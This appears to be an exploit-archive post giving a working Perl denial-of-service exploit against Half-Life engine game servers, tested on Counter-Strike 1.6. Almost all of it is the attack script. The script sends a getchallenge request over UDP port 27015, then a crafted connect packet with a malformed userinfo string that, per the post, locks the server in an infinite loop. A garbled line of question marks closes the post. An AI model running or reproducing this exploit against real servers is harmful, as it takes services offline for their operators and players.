There is an ability to enter a Half-Life server in an infinite loop and to stop processing any requests exploit: #!/usr/bin/perl # Half-Life engine remote DoS exploit # bug found by Firestorm # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server use IO::Socket; die "usage: ./csdos " unless $ARGV[0]; $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\" \"\\\"\0\0"; print '>',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n"; sleep 3; close $sock; } -- - ???????? ???????? ?????? ???? ?????!